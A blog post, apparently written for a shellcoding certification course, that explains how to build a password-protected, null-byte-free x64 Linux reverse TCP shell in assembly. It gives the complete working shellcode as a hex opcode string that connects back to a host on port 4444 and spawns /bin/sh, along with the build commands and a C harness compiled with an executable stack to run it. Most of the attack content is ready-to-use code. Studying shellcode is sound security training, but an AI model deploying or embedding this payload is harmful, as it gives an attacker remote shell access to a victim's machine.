The objective here is to create a reverse TCP shell in x64 assembly that authenticates the attacker with a password and contains no null bytes (0x00).

So, where to start? Much like in the previous post, by basing our code on the equivalent C source code. Here is what a reverse TCP shell looks like in C:

fig1
Figure 1 – reverse shell in C

I will try not to repeat myself in this post, since I’ve already laid out the basic rules, and the reasoning behind not having error checks, in the TCP bind shell explanation.

One of the differences in this post, compared to the previous bind shell, is that I realised there is yet another improvement one can make to shellcode. It reduced a previous draft of this shellcode from 110 bytes to 104 (oh, the smile on my face). Bear in mind that this has been a learning process and, even though I could rewrite the previous post’s bind shell to make it smaller, I decided to be honest about the learning itself and leave it as it is.

Note that the way I’ve been learning techniques to reduce shellcode size is by going through as many shellcodes as I can (mostly the shortest I can find) while consulting Intel’s manual to understand what some rarely seen instructions do and to check their byte size (when I’m not assembling and objdump’ing them to be sure). And, while I have seen some very, very short shellcode, I’ve noticed that it sometimes gets there by sacrificing robustness, which is something I’m not willing to do.

Now, the improvement I mentioned comes from noticing that many shellcodes were doing the following:

push rsp
pop rdi

instead of:

mov rdi, rsp

This was confusing to me because, at that point, I thought that the push was 2 bytes long and the pop was 1, which adds up to the same 3 bytes that the mov takes. BUT the push is only 2 bytes long when you’re pushing an immediate value (like push 10). If you’re pushing a register it’s only one byte. Fantastic! I immediately recalled several instances where I was doing this “mov r64,r64” (a lot in the execve section for sure), which means I can save one byte for every such instruction.
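
The byte counts can be checked with a small C sketch. It is only an illustration: the array and function names are hypothetical, and the bytes are the usual encodings that objdump shows for these instructions (the push rsp / pop rdi pair also appears as \x54\x5f in the final opcode string of this post).

```c
#include <assert.h>
#include <stddef.h>

/* Encodings as printed by objdump for each instruction sequence. */
const unsigned char mov_rdi_rsp[]      = {0x48, 0x89, 0xe7}; /* mov rdi, rsp       */
const unsigned char push_rsp_pop_rdi[] = {0x54, 0x5f};       /* push rsp ; pop rdi */
const unsigned char push_imm8[]        = {0x6a, 0x0a};       /* push 10            */

/* Bytes saved by replacing "mov rdi, rsp" with the push/pop pair. */
size_t bytes_saved(void)
{
    assert(sizeof mov_rdi_rsp > sizeof push_rsp_pop_rdi);
    return sizeof mov_rdi_rsp - sizeof push_rsp_pop_rdi;
}
```

Calling bytes_saved() gives the one byte gained per replaced mov. One caveat worth keeping in mind: the one-byte push and pop forms apply to the original eight registers (RAX to RDI); pushing or popping R8 to R15 needs an extra prefix byte, so the saving disappears there.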

You should realise, by the end of analysing my final code, that I don’t always use the shortest option when it comes to these byte size reduction techniques. This is because of robustness. For example, I won’t use a 2 byte long “mov al,41” for a socket syscall if I’m not absolutely positive that the 7 upper bytes of the RAX register are zeros. “push 41” followed by “pop rax” guarantees just that, which means there are some places where I’ll definitely use the longer option, specifically after syscalls that “pollute” those upper bytes of RAX with their return value.
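
The difference between the two options can be modelled in plain C. This is a simulation of the register effects only, under the assumption that a failed syscall left a negative value such as -1 in RAX; the function names are made up for the example.

```c
#include <assert.h>
#include <stdint.h>

/* Effect of "mov al, imm8": only the lowest byte of RAX is replaced,
   the 7 upper bytes keep whatever was there before. */
uint64_t mov_al(uint64_t rax, uint8_t imm8)
{
    return (rax & ~(uint64_t)0xff) | imm8;
}

/* Effect of "push imm8 ; pop rax": the immediate is sign-extended to
   64 bits on the stack, so the whole register is overwritten. */
uint64_t push_pop_rax(int8_t imm8)
{
    assert(imm8 >= 0); /* syscall numbers used in this post are below 128 */
    return (uint64_t)(int64_t)imm8;
}
```

With RAX holding 0xffffffffffffffff, mov_al(rax, 41) yields 0xffffffffffffff29, which is not a valid syscall number, while push_pop_rax(41) always yields exactly 41.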

So let’s start by creating the socket [Figure 1 – line 23].

Again, I won’t explain how to make a syscall, where to get the syscall RAX register values, or how to know which constant value to use when you see AF_INET and SOCK_STREAM in the C code, since I already did so in the previous post.

So, the socket creation is pretty much the same as in the TCP bind shell and comes down to:

fig9
Figure 2 – socket syscall

Now we need to build up the socket structure with the information on the IP and TCP port to connect back to, and perform the connect itself:

fig3
Figure 3 – socket structure and connect syscall

The RAX register contains the socket returned by the socket syscall and, because we want to send it as the first parameter to the connect syscall, we start by moving it to RDI.

Now, regarding the apparently random value that I move into RBX, this is how I came to it:

  1. I compiled the code using an easy-to-read (and successfully tested) set of instructions, with no care at all about null bytes, using 127.0.0.1 (localhost) as the IP and 4444 as the TCP port. 4444 is 0x115c in hex; the port is stored in network byte order (bytes 11 5c in memory), so when written as a value on this little endian architecture it becomes 0x5c11 (byte order reversal). The IP address is reversed in the same way:

    fig4
    Figure 4
  2. I used GDB, set a breakpoint on the instruction right after the last one (sub rsp,8), and checked how the stack (RSP) was laid out. The structure is exactly 16 bytes long. The point of this exercise is to replace all of Figure 4’s instructions with 2 push instructions, and that’s why I’m checking its layout:

    fig11
    Figure 5 – stack layout
  3. Then, after pushing the zeroed-out RDX (the top eight zeros; “top” in terms of addressing, although they appear at the bottom of Figure 5), I took the value as it is laid out in memory: 02 00 11 5c 7f 00 00 01; reversed it (little endian): 01 00 00 7f 5c 11 00 02; and, because of all the null bytes this would contain if I just moved it into a register, I flipped every single bit, giving: fe ff ff 80 a3 ee ff fd. Notice that I can only do this because there were no 0xff bytes in there; otherwise I’d still end up with a null byte after the flip.
  4. Finally, after moving that flipped value into RBX, I execute the instruction not rbx to reverse the bit flipping.
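
The arithmetic in the steps above can be reproduced with a short C sketch. It is an illustration under stated assumptions, not the code from the figures: the function names are hypothetical, and the structure layout (2-byte family, 2-byte port in network order, 4-byte address) is the usual sockaddr_in layout on Linux.

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if any of the 8 bytes of v is 0x00. */
int has_null_byte(uint64_t v)
{
    for (int i = 0; i < 8; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Builds the first 8 bytes of the structure as they sit in memory and
   packs them into the 64-bit value a little endian CPU would load:
   memory byte 0 becomes the least significant byte. */
uint64_t pack_sockaddr(uint16_t family, uint16_t port, const uint8_t ip[4])
{
    uint8_t mem[8];
    mem[0] = (uint8_t)(family & 0xff); /* family, little endian       */
    mem[1] = (uint8_t)(family >> 8);
    mem[2] = (uint8_t)(port >> 8);     /* port, network (big endian)  */
    mem[3] = (uint8_t)(port & 0xff);
    for (int i = 0; i < 4; i++)
        mem[4 + i] = ip[i];            /* address, network byte order */

    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | mem[i];
    return v;
}

/* Flips every bit so the immediate carries no null bytes; the
   shellcode undoes this at run time with "not rbx". */
uint64_t encode_without_nulls(uint64_t v)
{
    uint64_t flipped = ~v;
    assert(!has_null_byte(flipped)); /* fails if v had a 0xff byte */
    return flipped;
}
```

For AF_INET (2), port 4444 and 127.0.0.1, pack_sockaddr returns 0x0100007f5c110002 and encode_without_nulls turns it into 0xfeffff80a3eefffd, the value moved into RBX. A different IP or port only works with this trick if none of its bytes is 0xff.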

 

And now we move on to redirecting the local application’s stdin, stdout and stderr file descriptors to the socket we just connected to the remote IP and port:

fig12.png
Figure 6

This code has also been explained in the TCP bind shell post.
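
For readers who skipped that post, the redirection boils down to a countdown loop over dup2. The C sketch below mirrors that loop; the function name and the lowest parameter are hypothetical and exist only so the helper can be tried on descriptors other than 0, 1 and 2.

```c
#include <assert.h>
#include <unistd.h>

/* Duplicates sock onto count descriptors starting at lowest, counting
   down the way the shellcode loop does. Returns how many dup2 calls
   succeeded. */
int redirect_fds(int sock, int lowest, int count)
{
    assert(count > 0);
    int done = 0;
    for (int fd = lowest + count - 1; fd >= lowest; fd--)
        if (dup2(sock, fd) == fd)
            done++;
    return done;
}
```

The shellcode case corresponds to redirect_fds(sock, 0, 3), which points descriptors 2, 1 and 0 at the connected socket, in that order.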

Now, the authentication code.

fig7.png
Figure 7 – authentication section
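
At the C level, the intent of the authentication step can be sketched as follows. This is a simplified illustration, not a line-by-line translation of Figure 7: the function name is hypothetical, and the password is simply read off the eight bytes loaded into RBX in the opcode string further down (31 32 33 34 35 36 37 0a, that is 1234567 followed by a newline).

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

#define PASSWORD "1234567\n" /* 8 bytes, taken from the opcode string */

/* Reads 8 bytes from fd and returns 1 if they match PASSWORD, else 0. */
int check_password(int fd)
{
    char buf[8];
    assert(sizeof buf == sizeof PASSWORD - 1);
    ssize_t n = read(fd, buf, sizeof buf);
    return n == (ssize_t)sizeof buf && memcmp(buf, PASSWORD, sizeof buf) == 0;
}
```

In the shellcode the descriptor is 0, which already points at the socket after the redirection, and a failed comparison jumps past the execve section.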

The only change in the authentication code, compared to the TCP bind shell, is the improvement I mentioned of replacing each mov r64,r64 with a push r64 and pop r64. The same improvement was made to the execve syscall itself:

fig8.png
Figure 8 – execve code

And it’s done!

We now compile the code:

nasm -f elf64 RevShell.nasm -o RevShell.o && ld RevShell.o -o RevShell

To try the shellcode, we extract the opcodes in hexadecimal format using some command line ninjutsu:

for i in `objdump -d RevShell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done

The output will be placed inside the following array in C code:

#include <stdio.h>
#include <string.h>

/* Shellcode bytes extracted with the objdump one-liner above */
unsigned char code[] = \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x48\xbb\xfd\xff\xee\xa3\x80\xff\xff\xfe\x48\xf7\xd3\x53\x54\x5e\xb0\x2a\xb2\x10\x0f\x05\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x54\x5e\xb2\x08\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x54\x5f\xf3\xa6\x75\x1a\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5a\x57\x54\x5e\x0f\x05\x90";

int main(void)
{
    /* strlen gives the real length only because there are no null bytes */
    printf("Shellcode Length:  %d\n", (int)strlen((const char *)code));
    /* Treat the byte array as a function and jump into it */
    int (*ret)(void) = (int (*)(void))code;
    ret();
    return 0;
}
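
Since the test program measures the shellcode with strlen, the printed length is only trustworthy if the array really has no null bytes in it. A small helper can confirm that independently; the function name is hypothetical and the sketch is not part of the original test program.

```c
#include <assert.h>
#include <stddef.h>

/* Counts the 0x00 bytes in the first len bytes of buf. */
size_t count_null_bytes(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            nulls++;
    return nulls;
}
```

Calling count_null_bytes(code, sizeof(code) - 1) on the array above should return 0; the - 1 leaves out the terminator that the C compiler appends to the string literal.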

This test program is then compiled with:

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

And executed:

fig9
Figure 9 – shellcode execution (104 bytes long)
fig10
Figure 10 – Attacker listening on port 4444 and getting the connection from the shellcode

 

You can find all the files on my gitlab account.

On a personal note, I just want to give a huge thanks to Vivek Ramachandran and the Pentester Academy team. I have enjoyed every second of this course and have learned so many interesting things. Thank you!

 


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: PA-2109